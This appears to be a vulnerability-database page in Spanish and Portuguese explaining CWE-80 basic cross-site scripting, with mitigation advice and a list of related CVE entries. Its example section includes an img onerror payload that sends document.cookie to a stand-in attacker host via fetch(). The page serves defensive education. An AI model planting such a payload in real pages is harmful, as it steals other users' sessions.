Fallos del tipo CWE-80

586 resultados

Falta de neutralização de tags HTML relacionadas a scripts (XSS básico)

Quando uma aplicação web recebe dados do usuário e os insere diretamente no HTML da página sem sanitização ou escapamento, um atacante consegue injetar tags e scripts maliciosos que executam no navegador de outros usuários. É um dos tipos mais comuns de XSS (Cross-Site Scripting) e permite roubo de sessão, credenciais ou redirecionamento para sites maliciosos.

Ejemplo

Um formulário de busca que mostra o termo pesquisado na página sem validação: se o usuário entra <script>alert('xss')</script>, o script executa. Ou um campo de comentário que exibe <img src=x onerror='fetch(malicious.com?cookie='+document.cookie+')'>, roubando o cookie da sessão.

Cómo mitigar

Sempre escapar/encodar saídas HTML (ex: converter < para &lt;, > para &gt;), usar Content Security Policy (CSP) nos headers HTTP, e validar/sanitizar entrada no servidor. Em JavaScript, prefira textContent no lugar de innerHTML quando possível; em frameworks, use templating seguro (React, Vue escapam por padrão).

CVE-2023-29508HIGHorg.xwiki.platform:xwiki-platform-livedata-macro vulnerable to Cross-site ScriptingEPSS 0.4%CVE-2025-62172HIGHHome Assistant vulnerable to Stored XSS in Energy dashboard from Energy Entity NameEPSS 0.4%CVE-2026-41611HIGHVisual Studio Code Remote Code Execution VulnerabilityEPSS 0.4%CVE-2024-47815MEDIUMCross-site Scripting in IncidentReportingEPSS 0.4%CVE-2023-44396MEDIUMiTop vulnerable to XSS in dashlet modifications ajax endpointsEPSS 0.4%CVE-2024-58353CRITICALCal.com through 4.7.15 Cross-Site Scripting via booking questionsEPSS 0.4%CVE-2024-58355CRITICALCal.com through 4.7.15 Cross-Site Scripting via booking questionsEPSS 0.4%CVE-2024-6183MEDIUMEZ-Suite EZ-Partner Forgot Password cross site scriptingEPSS 0.4%CVE-2024-24874MEDIUMWordPress Polls CP plugin <= 1.0.71 - Content Injection vulnerabilityEPSS 0.4%CVE-2024-47812MEDIUMCross-site Scripting (XSS) on Special:RequestImportQueue when displaying request date in ImportDumpEPSS 0.4%CVE-2024-56199MEDIUMphpMyFAQ Vulnerable to Stored HTML Injection at FAQEPSS 0.4%CVE-2023-50933MEDIUMIBM PowerSC HTML injectionEPSS 0.4%CVE-2025-36321MEDIUMVulnerabilities found in Watson Data IntelligenceEPSS 0.4%CVE-2023-22309MEDIUMReflected Cross Site Scripting (XSS)EPSS 0.4%CVE-2023-23548MEDIUMXSS in business intelligenceEPSS 0.4%CVE-2024-20341MEDIUMCisco Adaptive Security Appliance WebVPN Cross-Site Scripting VulnerabilityEPSS 0.4%CVE-2025-51989HIGHHTML injection vulnerability in the registration interface in Evolution Consulting Kft. HRmaster module v235 allows an attacker to inject HTEPSS 0.4%CVE-2026-57535LOWContent injected to PDF rendering contexts could, in many places, include HTML content including <img> tags. If the src attribute of these EPSS 0.4%CVE-2024-27716MEDIUMCross Site Scripting vulnerability in Eskooly Web Product v.3.0 and before allows a remote attacker to execute arbitrary code via the messagEPSS 0.4%CVE-2026-65841MEDIUMJodit has cross-site scripting (XSS) via <script> nested in SVG that bypasses clean-html sanitizationEPSS 0.4%